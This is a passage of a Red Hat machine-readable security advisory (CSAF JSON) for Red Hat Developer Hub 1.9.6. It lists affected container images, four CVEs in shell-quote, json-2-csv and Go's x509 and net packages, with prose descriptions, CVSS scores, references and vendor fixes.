"url": "https://issues.redhat.com/browse/RHIDP-14939"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14941",
"url": "https://issues.redhat.com/browse/RHIDP-14941"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-14943",
"url": "https://issues.redhat.com/browse/RHIDP-14943"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-15033",
"url": "https://issues.redhat.com/browse/RHIDP-15033"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-15039",
"url": "https://issues.redhat.com/browse/RHIDP-15039"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-15042",
"url": "https://issues.redhat.com/browse/RHIDP-15042"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-15067",
"url": "https://issues.redhat.com/browse/RHIDP-15067"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-15073",
"url": "https://issues.redhat.com/browse/RHIDP-15073"
},
{
"category": "external",
"summary": "https://issues.redhat.com/browse/RHIDP-15145",
"url": "https://issues.redhat.com/browse/RHIDP-15145"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_33574.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Developer Hub 1.9.6 release.",
"tracking": {
"current_release_date": "2026-07-01T20:16:18+00:00",
"generator": {
"date": "2026-07-01T20:16:18+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.1"
}
},
"id": "RHSA-2026:33574",
"initial_release_date": "2026-06-30T15:00:33+00:00",
"revision_history": [
{
"date": "2026-06-30T15:00:33+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-06-30T15:00:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-07-01T20:16:18+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Developer Hub 1.9",
"product": {
"name": "Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhdh:1.9::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Developer Hub"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-hub-rhel9@sha256%3A044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c?arch=amd64\u0026repository_url=registry.redhat.io/rhdh/rhdh-hub-rhel9\u0026tag=1782761244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-rhel9-operator@sha256%3A219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785?arch=amd64\u0026repository_url=registry.redhat.io/rhdh/rhdh-rhel9-operator\u0026tag=1782767215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"product": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"product_id": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhdh-operator-bundle@sha256%3A66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893?arch=amd64\u0026repository_url=registry.redhat.io/rhdh/rhdh-operator-bundle\u0026tag=1782772967"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 as a component of Red Hat Developer Hub 1.9",
"product_id": "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
},
"product_reference": "registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64",
"relates_to_product_reference": "Red Hat Developer Hub 1.9"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-9277",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"discovery_date": "2026-05-22T14:01:14.427751+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2480741"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the shell-quote component. The quote() function did not properly validate object-token inputs, allowing line terminators to pass unescaped into the output. A remote attacker could exploit this vulnerability by providing specially crafted input, which a POSIX shell would interpret as a command separator. This could lead to command injection, enabling the attacker to execute arbitrary code on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-9277"
},
{
"category": "external",
"summary": "RHBZ#2480741",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480741"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-9277",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9277"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-9277",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9277"
},
{
"category": "external",
"summary": "https://github.com/ljharb/shell-quote",
"url": "https://github.com/ljharb/shell-quote"
},
{
"category": "external",
"summary": "https://github.com/ljharb/shell-quote/commit/1518179",
"url": "https://github.com/ljharb/shell-quote/commit/1518179"
},
{
"category": "external",
"summary": "https://github.com/ljharb/shell-quote/security/advisories/GHSA-w7jw-789q-3m8p",
"url": "https://github.com/ljharb/shell-quote/security/advisories/GHSA-w7jw-789q-3m8p"
},
{
"category": "external",
"summary": "https://www.npmjs.com/package/shell-quote",
"url": "https://www.npmjs.com/package/shell-quote"
}
],
"release_date": "2026-05-22T13:22:38.873000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators"
},
{
"cve": "CVE-2026-9673",
"cwe": {
"id": "CWE-1236",
"name": "Improper Neutralization of Formula Elements in a CSV File"
},
"discovery_date": "2026-05-28T06:01:00.245616+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2482486"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in json-2-csv. An attacker can bypass the `preventCsvInjection` option to inject malicious formulas into CSV (Comma Separated Values) files. When these manipulated CSV files are opened in spreadsheet applications, the injected formulas can execute, potentially leading to arbitrary code execution or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "json-2-csv: json-2-csv: CSV Injection vulnerability allows arbitrary code execution via `preventCsvInjection` bypass.",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate vulnerability in `json-2-csv` allows for CSV Injection due to a bypass in the `preventCsvInjection` option. While exploitation requires a user to open a specially crafted CSV file in a spreadsheet application, successful attacks could lead to arbitrary code execution or information disclosure. This affects Red Hat Developer Hub and Red Hat Ansible Automation Platform when processing untrusted data that is subsequently exported to CSV and opened by a user.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-9673"
},
{
"category": "external",
"summary": "RHBZ#2482486",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2482486"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-9673",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9673"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-9673",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9673"
},
{
"category": "external",
"summary": "https://gist.github.com/whoamins/299745a2d36b482b44e9613b78e40613",
"url": "https://gist.github.com/whoamins/299745a2d36b482b44e9613b78e40613"
},
{
"category": "external",
"summary": "https://github.com/mrodrig/json-2-csv/blob/main/src/json2csv.ts%23L410",
"url": "https://github.com/mrodrig/json-2-csv/blob/main/src/json2csv.ts%23L410"
},
{
"category": "external",
"summary": "https://github.com/mrodrig/json-2-csv/commit/0fdd0bb6d0273178cd940afc323ccbce19688229",
"url": "https://github.com/mrodrig/json-2-csv/commit/0fdd0bb6d0273178cd940afc323ccbce19688229"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSON2CSV-14221326",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSON2CSV-14221326"
}
],
"release_date": "2026-05-28T05:00:02.387000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "json-2-csv: json-2-csv: CSV Injection vulnerability allows arbitrary code execution via `preventCsvInjection` bypass."
},
{
"cve": "CVE-2026-27145",
"cwe": {
"id": "CWE-606",
"name": "Unchecked Input for Loop Condition"
},
"discovery_date": "2026-06-02T23:01:08.992540+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484207"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `crypto/x509` package of `golang`. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by presenting a specially crafted X.509 certificate with a large number of DNS Subject Alternative Name (SAN) entries. The certificate verification process, specifically the `VerifyHostname` function, incurs excessive computational overhead due to repeated string operations when processing these entries. This can lead to a significant performance degradation or unresponsiveness of systems validating such certificates.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: golang crypto/x509: Denial of Service via excessive processing of DNS SAN entries",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the Go standard library crypto/x509 package. When verifying a TLS certificate hostname, VerifyHostname processed each DNS Subject Alternative Name (SAN) entry in a loop and repeatedly split the candidate hostname on \".\" characters. For certificates with a very large DNS SAN list, CPU use could grow quadratically with the number of SAN entries and hostname labels. Because hostname verification runs before the certificate chain is built, this overhead can occur even when the certificate is not trusted.\n\nRed Hat rates this issue as Important. It affects Red Hat products that include the Go standard library crypto/x509 code from an affected Go toolchain version (before Go 1.25.11, or from Go 1.26.0 through Go 1.26.3). Applications and container images built with a fixed Go release (1.25.11 or later, or 1.26.4 or later) are not affected. Community distributions such as Fedora are also affected.\n\nUpstream fix: Go 1.25.11 and Go 1.26.4 (GO-2026-5037).",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27145"
},
{
"category": "external",
"summary": "RHBZ#2484207",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484207"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27145",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27145"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27145",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27145"
},
{
"category": "external",
"summary": "https://go.dev/cl/783621",
"url": "https://go.dev/cl/783621"
},
{
"category": "external",
"summary": "https://go.dev/issue/79694",
"url": "https://go.dev/issue/79694"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw",
"url": "https://groups.google.com/g/golang-announce/c/tKs3rmcBcKw"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5037",
"url": "https://pkg.go.dev/vuln/GO-2026-5037"
}
],
"release_date": "2026-06-02T22:01:36.954000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "A flaw was found in the Go standard library crypto/x509 package. When verifying a TLS certificate hostname, VerifyHostname processed each DNS Subject Alternative Name (SAN) entry in a loop and repeatedly split the candidate hostname on \".\" characters. For certificates with a very large DNS SAN list, CPU use could grow quadratically with the number of SAN entries and hostname labels. Because hostname verification runs before the certificate chain is built, this overhead can occur even when the certificate is not trusted.\n\nRed Hat rates this issue as Important. It affects Red Hat products that include the Go standard library crypto/x509 code from an affected Go toolchain version (before Go 1.25.11, or from Go 1.26.0 through Go 1.26.3). Applications and container images built with a fixed Go release (1.25.11 or later, or 1.26.4 or later) are not affected. Community distributions such as Fedora are also affected.\n\nUpstream fix: Go 1.25.11 and Go 1.26.4 (GO-2026-5037).",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: golang crypto/x509: Denial of Service via excessive processing of DNS SAN entries"
},
{
"cve": "CVE-2026-33811",
"cwe": {
"id": "CWE-1341",
"name": "Multiple Releases of Same Resource or Handle"
},
"discovery_date": "2026-05-07T20:01:34.913869+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467822"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the Go `net` package, affecting applications configured to use the `cgo` DNS resolver. A remote attacker could trigger a double-free memory error by providing a very long CNAME response, leading to a crash of the vulnerable application and impacting service availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33811"
},
{
"category": "external",
"summary": "RHBZ#2467822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467822"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33811",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33811"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
},
{
"category": "external",
"summary": "https://go.dev/cl/767860",
"url": "https://go.dev/cl/767860"
},
{
"category": "external",
"summary": "https://go.dev/issue/78803",
"url": "https://go.dev/issue/78803"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4981",
"url": "https://pkg.go.dev/vuln/GO-2026-4981"
}
],
"release_date": "2026-05-07T19:41:19.285000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-30T15:00:33+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:33574"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications can be configured to use the pure Go DNS resolver instead of the `cgo` DNS resolver. This can be achieved by setting the `GODEBUG` environment variable to `netdns=go`. For example, to run a Go application with this mitigation: `GODEBUG=netdns=go /path/to/your/go/application`. This change may require restarting affected applications or services to take effect. Users should verify that this change does not negatively impact DNS resolution for their specific application environment.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64",
